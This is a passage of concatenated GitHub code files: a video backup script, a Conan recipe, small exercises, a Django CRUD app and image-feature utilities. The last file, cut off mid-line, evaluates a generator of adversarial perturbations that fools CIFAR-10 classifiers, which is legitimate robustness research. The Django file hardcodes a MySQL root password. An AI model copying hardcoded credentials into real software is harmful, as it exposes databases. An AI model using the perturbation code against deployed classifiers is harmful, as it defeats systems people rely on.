os.system(\"cls\")\n\n guide_name = input(\"Nome do guia? 
\")\n os.system(\"cls\")\n\n print(\"Qual passeio?\")\n print(\"\")\n\n print(\"1) Morro Branco\")\n print(\"2) Lagoinha\")\n print(\"3) Canoa Quebrada\")\n print(\"4) Outro\")\n print(\"\")\n\n tour_option = int(input(\"Opção: \"))\n if tour_option == 1:\n tour_name = \"Morro Branco\"\n elif tour_option == 2:\n tour_name = \"Lagoinha\"\n elif tour_option == 3:\n tour_name = \"Canoa Quebrada\"\n elif tour_option == 4:\n tour_name = input(\"Digite o nome do passeio: \")\n else:\n raise ValueError(\"Opção inválida\")\n os.system(\"cls\")\n\n print(\"Cole o texto com os participantes e pressione Enter quando terminar:\")\n participants_text = \"\"\n while True:\n line = input()\n if line.lower() == \"sair\" or line == \"\":\n break\n participants_text += line + \"\\n\"\n\n participants = format_participants_text(participants_text)\n\n formatted_date = date.strftime(\"%d de %B de %Y\").lstrip(\"0\").upper()\n tour_name = tour_name.upper()\n guide_name = guide_name.upper()\n\n clipboard_text = f\"{formatted_date} - {tour_name} - {guide_name}\"\n pyperclip.copy(clipboard_text)\n\n return date, guide_name, tour_name, participants\n\ndef wait_for_keypress():\n print(\"\\nProcesso finalizado com sucesso. Aperte qualquer tecla para encerrar...\")\n msvcrt.getch()\n\ntry:\n # Get SD card path\n sd_card_path = get_sd_card_path()\n print(f\"Cartão SD detectado em: {sd_card_path}\")\n print(\"\")\n\n # Get user input\n date, guide_name, tour_name, participants = get_user_input()\n\n # Copy files from SD card\n files_to_copy = get_files_to_copy(sd_card_path)\n destination_folder = f\"bkp-{datetime.datetime.now().strftime('%Y%m%d%H%M%S')}\"\n destination_path = os.path.join(\"D:\\\\\", destination_folder)\n os.makedirs(destination_path, exist_ok=True)\n print(\"INICIANDO BACKUP DO CARTÃO:\")\n print(\"\")\n\n copy_files(files_to_copy, destination_path)\n\n # Create folder structure\n base_path = r\"D:\\ARQUIVO\"\n folder_path, footage_path, proxy_path = create_folder_structure(date, guide_name, tour_name, base_path)\n\n # Copy files\n print(\"INICIANDO CÓPIA DOS ARQUIVOS BRUTO:\")\n print(\"\")\n\n copy_files([os.path.join(destination_path, file) for file in files_to_copy if file.endswith(\".MP4\")], footage_path)\n\n print(\"INICIANDO CÓPIA DOS ARQUIVOS DE MÍDIAS PROXY:\")\n print(\"\")\n copy_files([os.path.join(destination_path, file) for file in files_to_copy if file.endswith(\".LRV\")], proxy_path)\n\n # Rename files in Proxy Media folder\n rename_files(proxy_path)\n\n # Write message file\n write_message_file(date, tour_name, folder_path)\n\n # Write participants file\n write_participants_file(participants, folder_path)\n\n # Wait for keypress to exit\n wait_for_keypress()\n\n os.startfile(folder_path)\n\nexcept ValueError as e:\n print(f\"Erro: {str(e)}\")\nexcept Exception as e:\n print(f\"Ocorreu um erro durante a execução do script: {str(e)}\")\n wait_for_keypress()\n","repo_name":"EriJohnson/litoral_videos_backup_sd_card","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72543534593","text":"from conans import ConanFile, CMake, tools\nimport sys, os\n\ndef option_on_off(option):\n return \"ON\" if option else \"OFF\"\n\nclass LMDBConan(ConanFile):\n name = \"lmdb\"\n version = \"0.9.24\"\n settings = \"os\", \"compiler\", \"build_type\", \"arch\"\n url = \"https://github.com/k-nuth/conan-lmdb\"\n license = \"OpenLDAP Public License\"\n\n generators = 
\"cmake\"\n\n options = {\"shared\": [True, False],\n \"fPIC\": [True, False],\n \"verbose\": [True, False],\n }\n\n default_options = \"shared=False\", \\\n \"fPIC=True\", \\\n \"verbose=False\"\n\n # exports = \"conanfile.py\", \"mdb.def\", \"win32/*\", \"LICENSE.md\" # \"CMakeLists.txt\",\n exports_sources = [\"CMakeLists.txt\"]\n build_policy = \"missing\"\n\n @property\n def msvc_mt_build(self):\n return \"MT\" in str(self.settings.get_safe(\"compiler.runtime\"))\n\n @property\n def fPIC_enabled(self):\n if self.settings.compiler == \"Visual Studio\":\n return False\n else:\n return self.options.fPIC\n\n @property\n def is_shared(self):\n if self.options.shared and self.msvc_mt_build:\n return False\n else:\n return self.options.shared\n\n\n def config_options(self):\n if self.settings.compiler == \"Visual Studio\":\n self.options.remove(\"fPIC\")\n if self.options.shared and self.msvc_mt_build:\n self.options.remove(\"shared\")\n\n def configure(self):\n del self.settings.compiler.libcxx #Pure-C \n\n def package_id(self):\n self.info.options.verbose = \"ANY\"\n\n def source(self):\n # extension = \"zip\" if sys.platform == \"win32\" else \"tar.gz\" % self.folder_name\n extension = \"zip\" if sys.platform == \"win32\" else \"tar.gz\" #% self.build_folder\n \n base_name = \"LMDB_%s\" % (self.version)\n zip_name = \"%s.%s\" % (base_name, extension)\n url = \"https://github.com/LMDB/lmdb/archive/%s\" % (zip_name)\n self.output.info(\"Downloading %s...\" % url)\n tools.download(url, zip_name)\n tools.unzip(zip_name, \".\")\n os.unlink(zip_name)\n os.rename(\"lmdb-%s\" % base_name, \"lmdb\")\n\n def build(self):\n # cmake = CMake(self.settings)\n # shared = \"-DBUILD_SHARED_LIBS=1\" if self.options.shared else \"\"\n # self.run('cmake %s %s %s' % (self.conanfile_directory, cmake.command_line, shared))\n # self.run(\"cmake --build . %s\" % cmake.build_config)\n\n cmake = CMake(self)\n cmake.verbose = self.options.verbose\n\n cmake.definitions[\"ENABLE_SHARED\"] = option_on_off(self.is_shared)\n cmake.definitions[\"ENABLE_POSITION_INDEPENDENT_CODE\"] = option_on_off(self.fPIC_enabled)\n\n\n cmake.configure(source_dir=self.source_folder)\n cmake.build()\n\n def package(self):\n self.copy(\"lmdb.h\", dst=\"include\", src=\"lmdb/libraries/liblmdb\")\n self.copy(\"*.lib\", dst=\"lib\", src=\"lib\", keep_path=True)\n self.copy(\"*.a\", dst=\"lib\", src=\"lib\", keep_path=True)\n self.copy(\"*.pdb\", dst=\"lib\", src=\"lib\", keep_path=True)\n self.copy(\"*.dll\", dst=\"bin\", src=\"lib\", keep_path=True)\n self.copy(\"*.so\", dst=\"bin\", src=\"lib\", keep_path=True)\n self.copy(\"*.exe\", dst=\"bin\", src=\"bin\", keep_path=True)\n\n def package_info(self):\n if self.settings.build_type == \"Debug\":\n self.cpp_info.libs = [\"lmdbd\"]\n else:\n self.cpp_info.libs = [\"lmdb\"]\n \n if self.settings.os == \"Windows\":\n self.cpp_info.libs.append(\"ntdll\")\n else:\n self.cpp_info.libs.append(\"pthread\")\n","repo_name":"k-nuth/conan-lmdb","sub_path":"conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":3624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26025461074","text":"from quafing.multipdf import multipdf_init\nfrom quafing.multipdf.multipdf_collection import MultiPdfCollection\n\ndef create_multi_pdf(mdpdfType, data,colmetadata,calculate=True,*args,**kwargs):\n\t\"\"\"\n\tcreate a multipdf object from data and (column)metadata\n\n\t:param mdpdfType: str; Type of multidimensional pdf to create. 
See quafing.multipdf.__init__() for valid types\n\t:param data: pandas DataFrame; (columnar) data from which to create multipdf. \n\t:param colmetadata: array of dictionaries; metadata for each column\n\t:param calculate: bool; keyword to trigger calculation of (component) pdfs for created multipdf object. default True\n\t:param args: optional; arguments to be passed to multi_pdf class calculate_pdf() function\n\t:param kwargs: optional; keyword arguments to be passed to multi_pdf class calculate_pdf() function\n\t:return mdpdf: MultiDimensionalPdf object of specified type \n\t\"\"\"\n\tmdpdf = multipdf_init(mdpdfType)\n\tmdpdf._import_data(data,colmetadata)\n\tmdpdf._basic_validation()\n\tif calculate:\n\t    mdpdf.calculate_pdf(*args,**kwargs) \n\treturn mdpdf\n\n\ndef create_mdpdf_collection(mdpdfType, group_data, group_labels,colmetadata, calculate=True, validate_metadata=False, *args, **kwargs):\n    \"\"\"\n    Create a multi-dimensional pdf collection object from groups of data.\n\n    :param mdpdfType: str; Type of multidimensional pdfs to create. See quafing.multipdf.__init__() for valid types\n    :param group_data: list of pandas DataFrames with the data for groups of respondents\n    :param group_labels: list of labels associated with the groups\n    :param colmetadata: column metadata of the data/questions of each group\n    :param calculate: bool (default True). If True calculate density estimates for all groups\n    :param validate_metadata: bool (default False). If true perform extended validation of metadata conformity between groups\n    :param args: optional positional arguments to pass to create_multi_pdf() method \n    :param kwargs: optional keyword arguments to pass to create_multi_pdf() method\n    :return mdpdf_collection: collection of multi-dimensional pdfs (type MultiPdfCollection)\n    \n    \"\"\"\n    mdpdfs = []\n    for i, data in enumerate(group_data):\n        mdpdf = create_multi_pdf(mdpdfType,data, colmetadata, calculate=calculate, *args, **kwargs)\n        mdpdfs.append(mdpdf)\n    mdpdf_collection = MultiPdfCollection(mdpdfs,group_labels, colmetadata, mdpdfType, validate_metadata=validate_metadata)\n    return mdpdf_collection","repo_name":"SDCCA/quafing","sub_path":"quafing/multipdf/multipdf.py","file_name":"multipdf.py","file_ext":"py","file_size_in_byte":2464,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"11513214976","text":"#Read the name, age and sex of 4 people and show, at the end, the average of the ages, the name of the oldest\r\n#man and how many women are under 20 years old\r\n\r\nsomaidades = 0;\r\nconthomem = 0;\r\nmaisvelho = 0;\r\ncontmulhermenoridade = 0;\r\ncontpessoas = 0;\r\n\r\nfor c in range(0, 4):\r\n    nome = str(input(f\"Digite o nome da {c+1} pessoa: \")).upper().strip();\r\n    idade = int(input(\"Digite a idade dessa pessoa: \"));\r\n    sexo = str(input(\"Digite M se a pessoa for mulher e H se for homem: \")).upper();\r\n    somaidades = somaidades + idade;\r\n    contpessoas = contpessoas + 1;\r\n\r\n    if sexo == \"H\": #FINDING THE OLDEST MAN\r\n        conthomem = conthomem + 1;\r\n        if conthomem == 1:\r\n            nome_domaisvelho = nome;\r\n            maisvelho = idade;\r\n        else:\r\n            if maisvelho < idade:\r\n                maisvelho = idade;\r\n                nome_domaisvelho = nome;\r\n\r\n    if sexo == \"M\": #COUNTING HOW MANY WOMEN ARE UNDER 20\r\n        if idade < 20:\r\n            contmulhermenoridade = contmulhermenoridade + 1;\r\n\r\nmedia = somaidades / (contpessoas);\r\n\r\nprint(f\"A média das {contpessoas} idades é {media}.\");\r\nprint(f\"O nome do homem mais velho é: 
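\n# --- Editor's note (hedged sketch): a minimal usage example for create_mdpdf_collection defined above.\n# The 'factorized' type name and the metadata keys below are hypothetical placeholders, not taken from the quafing source.\nimport pandas as pd\ngroups = [pd.DataFrame({'q1': [1, 2, 2], 'q2': [0, 1, 0]}), pd.DataFrame({'q1': [2, 2, 1], 'q2': [1, 1, 0]})]\ncolmeta = [{'ColNames': 'q1', 'Type': 'disc'}, {'ColNames': 'q2', 'Type': 'disc'}]\ncollection = create_mdpdf_collection('factorized', groups, ['group_a', 'group_b'], colmeta, calculate=True)\n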
{nome_domaisvelho}.\");\r\nprint(f\"E houveram {contmulhermenoridade} mulheres abaixo de 20 anos.\");\r\n\r\n\r\n\r\n\r\n","repo_name":"GabriellyBailon/Cursos","sub_path":"CursoEmVideo/Python/Mundo 2/ex056.py","file_name":"ex056.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7908819478","text":"import pandas as pd\nimport numpy as np\nimport cv2\nfrom context import RAWDATADIR\nfrom helpers import read_before_and_after\n\ndef add_lags(\n df, \n n_lags=3,\n lag_cols = [\n 'Altitude', \n 'Delta', \n 'east_median',\n 'north_median',\n 'east_median_sift', \n 'north_median_sift', \n 'n_matches', \n 'n_matches_sift'\n ]):\n\n Xy = df.copy()\n\n for i in range(1, n_lags + 1):\n lag_feats = df.groupby('sequence')[lag_cols].shift(i)\n leap_feats = df.groupby('sequence')[lag_cols].shift(-i)\n diff_feats = df.groupby('sequence')[lag_cols].diff(i)\n leap_diff_feats = df.groupby('sequence')[lag_cols].diff(-i)\n\n Xy = Xy.join(lag_feats, rsuffix=f'_lag_{i}')\n Xy = Xy.join(leap_feats, rsuffix=f'_leap_{i}')\n \n Xy = Xy.join(diff_feats, rsuffix=f'_diff_{i}')\n Xy = Xy.join(leap_diff_feats, rsuffix=f'_leap_diff_{i}')\n\n return Xy.fillna(0.0)\n\nclass ImageFeatureExtractor:\n def __init__(self, train_dir=RAWDATADIR / 'train/train', test_dir=RAWDATADIR / 'test/test') -> None:\n self.train_dir = train_dir\n self.test_dir = test_dir\n\n self.clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8, 8))\n\n self.shitomasi_params = dict(\n maxCorners = 100,\n qualityLevel = 0.3,\n minDistance = 7,\n blockSize = 7 )\n\n self.lk_params = dict(\n winSize = (15,15),\n maxLevel = 2,\n criteria = (cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 10, 0.03)\n )\n\n self.sift = cv2.SIFT_create()\n\n def _apply_clahe_multichannel(self, img):\n \"\"\"Expects [h, w, c]\"\"\"\n processed = []\n for c_index in range(img.shape[-1]):\n processed.append(self.clahe.apply(img[:, :, c_index]))\n \n return np.dstack(processed)\n\n def _get_lk_features(self, img1, img2, apply_clahe=True):\n gray1 = cv2.cvtColor(img1, cv2.COLOR_BGR2GRAY)\n gray2 = cv2.cvtColor(img2, cv2.COLOR_BGR2GRAY)\n\n if apply_clahe:\n gray1, gray2 = self.clahe.apply(gray1), self.clahe.apply(gray2)\n \n p0 = cv2.goodFeaturesToTrack(gray1, mask = None, **self.shitomasi_params)\n\n if p0 is None:\n return None\n\n # calculate optical flow\n p1, st, err = cv2.calcOpticalFlowPyrLK(gray1, gray2, p0, None, **self.lk_params)\n\n # Select good points\n good_new = p1[st==1]\n good_old = p0[st==1]\n\n if np.sum(st) == 0:\n return None\n\n diffs = []\n centroids = []\n for _, (new, old) in enumerate(zip(good_new, good_old)):\n point1 = old.ravel()\n point2 = new.ravel()\n\n diff = point2 - point1\n\n # Flip for North/East axis alignment with X, Y on image\n diff[0] = - diff[0]\n diffs.append(point2 - point1)\n \n centroid = (point1 + point2) / 2\n centroids.append(centroid)\n\n mean, median, std = np.mean(diffs, axis=0), np.median(diffs, axis=0), np.std(diffs, axis=0)\n c_mean = np.mean(centroids, axis=0)\n \n feats = {\n 'east_mean': mean[0], 'east_median': median[0], 'east_std': std[0],\n 'north_mean': mean[1], 'north_median': median[1], 'north_std': std[1],\n 'centroid_east': 60 - c_mean[0], 'centroid_north': 60 - c_mean[1], 'n_matches': np.sum(st),\n }\n\n return pd.Series(feats)\n\n def _get_sift_features(self, img1, img2):\n \n img1, img2 = self._apply_clahe_multichannel(img1), self._apply_clahe_multichannel(img2)\n \n # find the keypoints and descriptors with 
SIFT\n kp1, des1 = self.sift.detectAndCompute(img1, None)\n kp2, des2 = self.sift.detectAndCompute(img2, None)\n \n # Check keypoint detection\n if len(kp1) <=1 or len(kp2) <= 1:\n return None\n\n # FLANN parameters\n FLANN_INDEX_KDTREE = 1\n index_params = dict(algorithm = FLANN_INDEX_KDTREE, trees = 5)\n search_params = dict(checks=50) # or pass empty dictionary\n\n flann = cv2.FlannBasedMatcher(index_params, search_params)\n matches = flann.knnMatch(des1,des2,k=2)\n \n # Need to draw only good matches, so create a mask\n matchesMask = [[0,0] for i in range(len(matches))]\n\n # ratio test as per Lowe's paper\n for i, (m,n) in enumerate(matches):\n if m.distance < 0.7 * n.distance:\n matchesMask[i]=[1,0]\n \n # Check match number\n masked_matches = np.asarray(matches)[np.asanyarray(matchesMask) == 1]\n if len(masked_matches) == 0:\n return None\n \n diffs = []\n centroids = []\n pts1 = []\n pts2 = []\n \n for i, m in enumerate(masked_matches):\n point2 = np.asarray(kp2[m.trainIdx].pt)\n point1 = np.asarray(kp1[m.queryIdx].pt)\n \n diff = point2 - point1\n pts1.append(point1)\n pts2.append(point2)\n\n # Flip for North/East axis alignment with X, Y on image\n diff[0] = - diff[0]\n diffs.append(point2 - point1)\n \n centroid = (point1 + point2) / 2\n centroids.append(centroid)\n\n mean, median, std = np.mean(diffs, axis=0), np.median(diffs, axis=0), np.std(diffs, axis=0)\n c_mean = np.mean(centroids, axis=0)\n\n feats = {\n 'east_mean_sift': mean[0], 'east_median_sift': median[0], 'east_std_sift': std[0],\n 'north_mean_sift': mean[1], 'north_median_sift': median[1], 'north_std_sift': std[1],\n 'centroid_east_sift': 60 - c_mean[0], 'centroid_north_sift': 60 - c_mean[1],\n 'n_matches_sift': len(masked_matches), \n }\n\n return pd.Series(feats)\n\n def get_features_from_row(self, row):\n base_dir = self.test_dir if pd.isna(row['North']) else self.train_dir\n \n img1, img2 = read_before_and_after(str(base_dir / row.name))\n\n sift_features = self._get_sift_features(img1, img2)\n lk_features = self._get_lk_features(img1, img2)\n\n if (sift_features is None) and (lk_features is None):\n return None\n else:\n return pd.concat([lk_features, sift_features])\n","repo_name":"guischmitd/kddbr-2022","sub_path":"kddbr/feature_extraction.py","file_name":"feature_extraction.py","file_ext":"py","file_size_in_byte":6348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20550719334","text":"# 16*. 
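\n# --- Editor's note (illustration): the Lowe ratio test applied above, reduced to plain Python;\n# a match is kept only when its best distance is clearly below the second-best, filtering ambiguous pairs.\ncandidates = [(0.20, 0.90), (0.55, 0.60)]  # (best, second-best) descriptor distances\nkept = [i for i, (m, n) in enumerate(candidates) if m < 0.7 * n]\nassert kept == [0]  # the second pair is too ambiguous and is dropped\n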
Write a program\n# that computes the percentage of G (guanine) and C (cytosine) characters\n# in the entered string (the program must not depend on the case of the entered characters).\n# For example, in the string \"acggtgttat\" the percentage of G and C characters equals 4/10 ⋅ 100 = 40.0,\n# where 4 is the number of G and C characters and 10 is the length of the string.\nstring = input(\"Введите символы \")\nspis2 = []\nspis = [i for i in string]\nfor i in spis:\n    if i == 'g' or i == 'G' or i == 'c' or i == 'C':\n        spis2.append(i)\nprint(f\"Содержание гуанина и цитозина составялет {len(spis2) / len(spis) * 100} %\")","repo_name":"Janyasvetlovskiy/Evgeniy_Svetlovskiy_Homeworks1","sub_path":"sr1/task_16.py","file_name":"task_16.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70924262915","text":"# Create two variables s1 and s2 holding arbitrary words, then build a new string s3 by inserting s2 into the middle of s1.\n\ns1 = \"maslo\"\ns2 = \"maslane\"\n\nsrodek = int(len(s1)/2)\ns1_1 = s1[0:srodek]\ns1_2 = s1[srodek:len(s1)]\ns3 = s1_1 + s2 + s1_2\nprint(s3)\n# Create a script that asks the user for a book title, the author's surname and the number of pages, and then:\ntytul = input(str(('Podaj tytuł ksiązki')))\n\nstrony = input('podaj liczbę stron')\nnazwisko = input(str('podaj nazwisko autora'))\ny = int(strony.isalpha())\ntytul_1 = tytul.replace(\" \", \"\")\nx = tytul_1.isalpha()\ntytul_t = tytul.title()\nnazwisko_t = nazwisko.title()\ncalosc = tytul + strony + nazwisko\n\nprint(x, y)\nprint(tytul_t, nazwisko_t)\nprint(tytul_t, nazwisko_t, strony)\nprint(len(calosc))\n\n\n\n\n","repo_name":"Jarwes00/KursPython2022","sub_path":"Homework/Ex_klasy_string.py","file_name":"Ex_klasy_string.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11604685863","text":"# Given an n × n 2D matrix representing an image.\n#\n# Rotate the image clockwise by 90 degrees.\n#\n# Note:\n#\n# You must rotate the image in place, which means you have to modify the input 2D matrix directly. Do not use a second matrix to rotate the image.\n#\n# Source: LeetCode (力扣)\n# Link: https://leetcode-cn.com/problems/rotate-image\n# Copyright belongs to LeetCode. Commercial reprints require official authorization; non-commercial reprints should credit the source.\n\nfrom typing import List\n\n\nclass Solution:\n    def rotate(self, matrix: List[List[int]]) -> None:\n        \"\"\"\n        Do not return anything, modify matrix in-place instead.\n        \"\"\"\n        if not matrix:\n            return\n\n        width = len(matrix[0])\n        height = len(matrix)\n\n        for h in range(height):\n            for w in range(h, width):\n                matrix[h][w], matrix[w][h] = matrix[w][h], matrix[h][w]\n\n        for h in range(height):\n            matrix[h].reverse()\n\n\ndef main():\n    matrix = [\n        [1, 2, 3],\n        [4, 5, 6],\n        [7, 8, 9]\n    ]\n    answer = [\n        [7, 4, 1],\n        [8, 5, 2],\n        [9, 6, 3]\n    ]\n\n    # matrix[0][0] = matrix[2][0]\n    # matrix[0][1] = matrix[1][0]\n    # matrix[0][2] = matrix[0][0]\n    #\n    # matrix[1][0] = matrix[2][1]\n    # matrix[1][1] = matrix[1][1]\n    # matrix[1][2] = matrix[0][1]\n    #\n    # matrix[2][0] = matrix[2][2]\n    # matrix[2][1] = matrix[1][2]\n    # matrix[2][2] = matrix[0][2]\n\n    matrix = [\n        [1, 2, 3, 4],\n        [5, 6, 7, 8],\n        [9, 10, 11, 12],\n        [13, 14, 15, 16]\n    ]\n    answer = [\n        [13, 9, 5, 1],\n        [14, 10, 6, 2],\n        [15, 11, 7, 3],\n        [16, 12, 8, 4]\n    ]\n\n    solution = Solution()\n    solution.rotate(matrix)\n    assert matrix == answer, matrix\n\n\nif __name__ == '__main__':\n    
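\n# --- Editor's note (illustration): a compact, case-insensitive version of the GC-content\n# computation from the homework task above, using str.count on a lowered copy of the sequence.\ndef gc_percent(seq):\n    s = seq.lower()\n    return (s.count('g') + s.count('c')) / len(s) * 100\nassert abs(gc_percent('acggtgttat') - 40.0) < 1e-9\n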
main()\n","repo_name":"imckl/leetcode","sub_path":"medium/48-rotate-image.py","file_name":"48-rotate-image.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"13478249276","text":"from django.shortcuts import render\n\n# Create your views here.\nimport MySQLdb\nfrom django.shortcuts import render, redirect\nfrom sims.models import Student\n\ndef sqlconnect():\n    conn = MySQLdb.connect(host=\"localhost\", user=\"root\", passwd=\"wangyutai\", db=\"sms\", charset='utf8')\n    return conn\n\n\n# Create your views here.\n# Handler for the student information list\ndef index(request):\n    # conn = sqlconnect()\n    # with conn.cursor(cursorclass=MySQLdb.cursors.DictCursor) as cursor:\n    #     cursor.execute(\"SELECT id,student_no,student_name FROM sims_student\")\n    #     students = cursor.fetchall()\n    students = Student.objects.all()\n    return render(request, 'student/index.html', {'students': students})\n\n\n# Handler for adding a student record\ndef add(request):\n    if request.method == 'GET':\n        return render(request, 'student/add.html')\n    else:\n        student_no = request.POST.get('student_no', '')\n        student_name = request.POST.get('student_name', '')\n        # conn = sqlconnect()\n        # with conn.cursor(cursorclass=MySQLdb.cursors.DictCursor) as cursor:\n        #     cursor.execute(\"INSERT INTO sims_student (student_no,student_name) \"\n        #                    \"values (%s,%s)\", [student_no, student_name])\n        #     conn.commit()\n        student = Student()\n        student.student_name = student_name\n        student.student_no = student_no\n        student.save()\n        return redirect('../')\n\n\n# Handler for editing a student record\ndef edit(request):\n    if request.method == 'GET':\n        id = request.GET.get(\"id\")\n        conn = sqlconnect()\n        with conn.cursor(cursorclass=MySQLdb.cursors.DictCursor) as cursor:\n            cursor.execute(\"SELECT id,student_no,student_name FROM sims_student where id =%s\", [id])\n            student = cursor.fetchone()\n        return render(request, 'student/edit.html', {'student': student})\n    else:\n        id = request.POST.get(\"id\")\n        student_no = request.POST.get('student_no', '')\n        student_name = request.POST.get('student_name', '')\n        conn = sqlconnect()\n        with conn.cursor(cursorclass=MySQLdb.cursors.DictCursor) as cursor:\n            cursor.execute(\"UPDATE sims_student set student_no=%s,student_name=%s where id =%s\",\n                           [student_no, student_name, id])\n            conn.commit()\n        return redirect('../')\n\n\n# Handler for deleting a student record\ndef delete(request):\n    id = request.GET.get(\"id\")\n    conn = sqlconnect()\n    with conn.cursor(cursorclass=MySQLdb.cursors.DictCursor) as cursor:\n        cursor.execute(\"DELETE FROM sims_student WHERE id =%s\", [id])\n        conn.commit()\n    return redirect('../')\n","repo_name":"751329612/3","sub_path":"sims/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"44390166391","text":"import argparse\nimport os\nimport pickle\nfrom cv2 import log\n\nimport numpy as np\nimport torch\nimport torchattacks\nfrom matplotlib import pyplot as plt\n\nimport torchvision\nfrom torchvision import models, transforms\nfrom torchvision.datasets import ImageFolder\nfrom utils import *\nfrom generator_cifar10 import Generator, Discriminator\nimport collections\nfrom collections import Counter\nimport json\nfrom cifar10_models import *\nimport copy\n\n\nclass NpEncoder(json.JSONEncoder):\n    def default(self, obj):\n        if isinstance(obj, np.integer):\n            return int(obj)\n        if isinstance(obj, np.floating):\n            return float(obj)\n        if isinstance(obj, np.ndarray):\n            return 
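\n# --- Editor's note (illustration): NpEncoder above exists because the stock json encoder rejects NumPy\n# scalars and arrays; with cls=NpEncoder they serialize cleanly instead of raising TypeError.\nimport json\nimport numpy as np\npayload = {'acc': np.float32(0.97), 'ids': np.arange(3)}\nprint(json.dumps(payload, cls=NpEncoder))  # the float32 and the ndarray are converted by default()\n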
obj.tolist()\n return json.JSONEncoder.default(self, obj)\n\n\ndef calculate_pcc(x, y):\n \"\"\"\n Calculate pearsonr mimic `scipy.stats.pearsonr`\n :param x: Logit output (N, num_classes)\n :param y: Logit output (N, num_classes)\n :return: N\n \"\"\"\n pearson = []\n for i, j in zip(x, y):\n mean_x = torch.mean(i)\n mean_y = torch.mean(j)\n xm = i.sub(mean_x)\n ym = j.sub(mean_y)\n\n r_num = xm.dot(ym)\n r_den = torch.norm(xm, 2) * torch.norm(ym, 2)\n r_val = r_num / r_den\n pearson.append(r_val.item())\n return pearson\n\n\ndef load_model(archs):\n model_list = {}\n for arch, ckpt_path in archs.items():\n normalize = Normalize(mean=[0.4914, 0.4822, 0.4465],\n std=[0.2023, 0.1994, 0.2010])\n model = globals()[arch]()\n ckpt = torch.load(ckpt_path)\n model = torch.nn.Sequential(normalize, model)\n model.load_state_dict(ckpt['state_dict'])\n # model = model[1] # only use the model, rather than the normalize\n model.eval()\n model.to(device)\n model_list[arch] = model\n return model_list\n\n\ndef calculate_mertic(pert, labels, adv_logits, clean_logits, pert_logits):\n \"\"\"\n Calculate the metric\n :param pert:\n :param labels:\n :param adv_logits:\n :param clean_logits:\n :param pert_logits:\n :return: numpy list\n \"\"\"\n clean_pert_logits = clean_logits + pert_logits\n\n clean_pred = torch.argmax(clean_logits, dim=1)\n adv_pred = torch.argmax(adv_logits, dim=1)\n pert_pred = torch.argmax(pert_logits, dim=1)\n adv_ops_pred = torch.argmax(clean_pert_logits, dim=1)\n\n accuracy_clean = torch.sum(clean_pred == labels).item()\n accuracy_adv = torch.sum(adv_pred == labels).item()\n accuracy_op = torch.sum(adv_pred == adv_ops_pred).item()\n accuracy_op_fr = torch.sum((adv_pred == adv_ops_pred) == (adv_pred != clean_pred)).item()\n fooling_num = torch.sum(adv_pred != clean_pred).item()\n accuracy_adv_pert = torch.sum(adv_pred == pert_pred).item()\n\n pert_norm = [torch.norm(pi, p=2).item() for pi in pert]\n\n pcc_value_adv_clean = calculate_pcc(adv_logits, clean_logits)\n pcc_value_adv_pert = calculate_pcc(adv_logits, pert_logits)\n pcc_value_adv_pert_clean = calculate_pcc(adv_logits, clean_pert_logits)\n\n return adv_pred.cpu().data.numpy(), pert_pred.cpu().data.numpy(), adv_ops_pred.cpu().data.numpy(), \\\n accuracy_clean, accuracy_adv, accuracy_op, accuracy_op_fr, fooling_num, accuracy_adv_pert,\\\n pert_norm, pcc_value_adv_clean, pcc_value_adv_pert, pcc_value_adv_pert_clean\n\n\n\n\ndef test_advops_generator(generator, model_list):\n fooling_num = 0\n accuracy_op = 0\n accuracy_clean = 0\n accuracy_adv = 0\n accuracy_adv_pert = 0\n l2_norms_list = []\n total_cnt = 0\n mertics_dict = {}\n tmp_dict = {\n \"adv_cls\":[],\n \"pert_cls\":[],\n \"clean_pert_cls\":[],\n\n \"l2_norms_list\":[],\n \"pcc_adv_clean\":[],\n \"pcc_value_adv_pert\":[],\n \"pcc_value_adv_pert_clean\":[],\n\n \"acc_clean\":0,\n \"acc_adv\":0,\n \"acc_op\":0,\n \"acc_op_fr\":0,\n \"fooling_num\":0,\n \"accuracy_adv_pert\":0,\n \"total_samples\":0,\n }\n for i, batch in enumerate(validation_loader):\n\n images, labels = batch\n images, labels = images.to(device), labels.to(device)\n\n # train the discriminator with fake data\n pert = generator(images)\n adv_images = torch.clamp(images + pert, 0, 1)\n\n pert = 1.0 / 2 * (pert + 1)\n for key, model in model_list.items():\n with torch.no_grad():\n f_adv = model(adv_images)\n f_clean = model(images)\n f_pert = model(pert)\n\n adv_pred, pert_pred, adv_ops_pred, \\\n acc_clean, acc_adv, acc_op, acc_op_fr, fooling_num, adv_pert_num, \\\n pert_norm, \\\n pcc_value_adv_clean, 
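\n# --- Editor's note (illustration): a sanity check that calculate_pcc above matches SciPy's pearsonr\n# row by row (scipy is assumed to be available here; it is not imported by this script).\nfrom scipy.stats import pearsonr\na, b = torch.randn(4, 10), torch.randn(4, 10)\nref = [pearsonr(x.numpy(), y.numpy())[0] for x, y in zip(a, b)]\nassert all(abs(o - r) < 1e-4 for o, r in zip(calculate_pcc(a, b), ref))\n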
